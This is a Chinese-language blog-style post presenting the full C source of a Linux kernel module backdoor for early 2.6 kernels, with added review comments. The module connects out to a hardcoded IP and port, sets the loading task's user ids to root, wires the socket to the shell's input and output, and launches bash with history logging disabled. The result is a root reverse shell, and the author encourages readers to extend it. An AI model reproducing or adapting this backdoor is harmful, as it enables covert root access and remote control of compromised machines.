一个简单的内核后门原型

wzt <wzt#xsec.org>

这是一个在内核模块中实现的反连(reverse connect)后门,大家看看它与应用层上的实现有什么不同吧,呵呵。注意:这段代码直接改写 task_struct 的 uid/gid 字段,并依赖 set_fs(KERNEL_DS),只适用于早期 2.6 内核;新内核已改用 cred 结构,set_fs() 也已被移除。
/*
 * Kernel mode connect backdoor,haha~
 *
 * just a demo module to teach you how to write a backdoor in kernel mode,
 * i believe you can add more code to make it strong and powerful,wulala.
 *
 * by wzt <wzt#xsec.org>
 *
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/types.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <linux/syscalls.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include "syscalls.h"

/* Callback target: the shell connects *out* to this host, so nothing has to
 * listen on the machine the module is loaded on. (Spelled REMOTO in the
 * original; kept because k_connect() uses this name.) */
#define REMOTO_IP "192.168.75.1"
/* Lowercase macro name is unusual for a constant; kept as k_connect() uses it. */
#define port 1080

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

/* Raw syscall stub for dup2 generated by "syscalls.h". execve() is called
 * below but not declared here — presumably the same header provides it;
 * verify. */
static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

/* argv for the spawned shell: --noprofile/--norc make bash start without
 * reading the user's startup files. */
static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

/* Minimal environment for the shell. HOME is not defined anywhere in this
 * file — presumably "syscalls.h" supplies it; confirm or the build fails.
 * HISTFILE=/dev/null keeps bash from writing a history file. */
char *env[]={
 "TERM=linux",
 "HOME=" HOME,
 "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
 ":/usr/local/sbin",
 "HISTFILE=/dev/null",
 NULL };
 
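/*
 * Open a TCP connection to REMOTO_IP:port from kernel context, give the
 * calling task root ids and replace it with /bin/bash whose stdin/stdout/
 * stderr are the socket. Runs in the context of whatever process loaded
 * the module (normally insmod), so on success that process becomes the
 * shell and this function never returns.
 *
 * Returns -1 on any failure; on success execve() does not return.
 *
 * Fixes over the original: the printk format strings used "/n" (a literal
 * slash-n, no newline); sock_release() was called on an uninitialised
 * pointer when sock_create() failed; the socket fd leaked on connect/exec
 * failure; and set_fs(KERNEL_DS) was never restored, which leaves a task
 * returning to userspace able to pass kernel addresses to later syscalls.
 *
 * NOTE(review): this targets pre-cred 2.6 kernels where uid/gid live
 * directly in task_struct and set_fs()/KERNEL_DS and the one-argument
 * sock_map_fd() exist; newer kernels need commit_creds() and
 * kernel_connect(), and set_fs() has since been removed.
 */
int k_connect(void)
{
	struct task_struct *tsk = current;
	struct socket *sock = NULL;
	struct sockaddr_in server;
	mm_segment_t old_fs;
	int sockfd;
	int error;

	/* The raw syscall stubs (dup2/execve) hand kernel pointers to the
	 * syscall layer, so the address limit must be raised; remember the
	 * old limit so every failure path can put it back. */
	old_fs = get_fs();
	set_fs(KERNEL_DS);

	error = sock_create(AF_INET, SOCK_STREAM, 0, &sock);
	if (error < 0) {
		/* sock is not valid on failure; there is nothing to release. */
		printk("[-] socket_create failed: %d\n", error);
		goto out_fs;
	}

	sockfd = sock_map_fd(sock);
	if (sockfd < 0) {
		printk("[-] sock_map_fd() failed.\n");
		goto out_release;
	}

	/* Zero the whole struct (covers sin_zero) before filling it in. */
	memset(&server, 0, sizeof(server));
	server.sin_family = PF_INET;
	server.sin_addr.s_addr = in_aton(REMOTO_IP);
	server.sin_port = htons(port);

	error = sock->ops->connect(sock, (struct sockaddr *)&server,
				   sizeof(server), sock->file->f_flags);
	if (error < 0) {
		printk("[-] connect to %s failed.\n", REMOTO_IP);
		goto out_close;
	}

	printk("[+] connect to %s ok.\n", REMOTO_IP);

	/* Become root before exec so the shell inherits the ids. */
	tsk->uid = 0;
	tsk->euid = 0;
	/* NOTE(review): only egid is 0; this odd real gid is kept from the
	 * original and looks like a placeholder — confirm intent. */
	tsk->gid = 0x11111111;
	tsk->egid = 0;

	/* Wire the socket to the shell's stdin/stdout/stderr; if any dup2
	 * fails the shell would be exec'd with a broken stdio, so bail out. */
	if (dup2(sockfd, 0) < 0 || dup2(sockfd, 1) < 0 || dup2(sockfd, 2) < 0) {
		printk("[-] dup2 failed.\n");
		goto out_close;
	}

	/* On success this replaces the current task image and never returns. */
	execve(earg[0], (const char **)earg, (const char **)env);

	/* Reaching this line means execve() failed. */
	printk("[-] execve of %s failed.\n", earg[0]);

out_close:
	/* The fd owns the socket once mapped; closing it releases the socket. */
	sys_close(sockfd);
	set_fs(old_fs);
	return -1;

out_release:
	sock_release(sock);
out_fs:
	set_fs(old_fs);
	return -1;
}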

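/*
 * Module init hook. Logs, then hands off to k_connect(); on success that
 * call exec()s the shell in the loading process and never returns.
 *
 * Fixes over the original: the function is declared int but fell off the
 * end without a return (undefined behaviour, and module_init uses the
 * value to decide whether the load succeeded), and the printk used "/n".
 *
 * Returns 0 when k_connect() reports success (it normally does not return
 * at all), otherwise the negative value k_connect() returned so insmod
 * fails rather than leaving a module that did nothing loaded.
 */
int k_socket_init(void)
{
	int rc;

	printk("[+] kernel socket test start.\n");

	rc = k_connect();
	return rc < 0 ? rc : 0;
}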

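/*
 * Module exit hook. There is no kernel-side state to undo here — the only
 * resource k_connect() creates is a socket fd in the loading task — so this
 * just logs. Fixes the "/n" in the original format string, which printed a
 * literal slash-n instead of ending the line.
 */
void k_socket_exit(void)
{
	printk("[+] kernel socket test over.\n");
}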

/* The init hook runs in the process loading the module; k_connect() exec()s
 * bash from that context, so on success the load never "completes". */
module_init(k_socket_init);
module_exit(k_socket_exit); 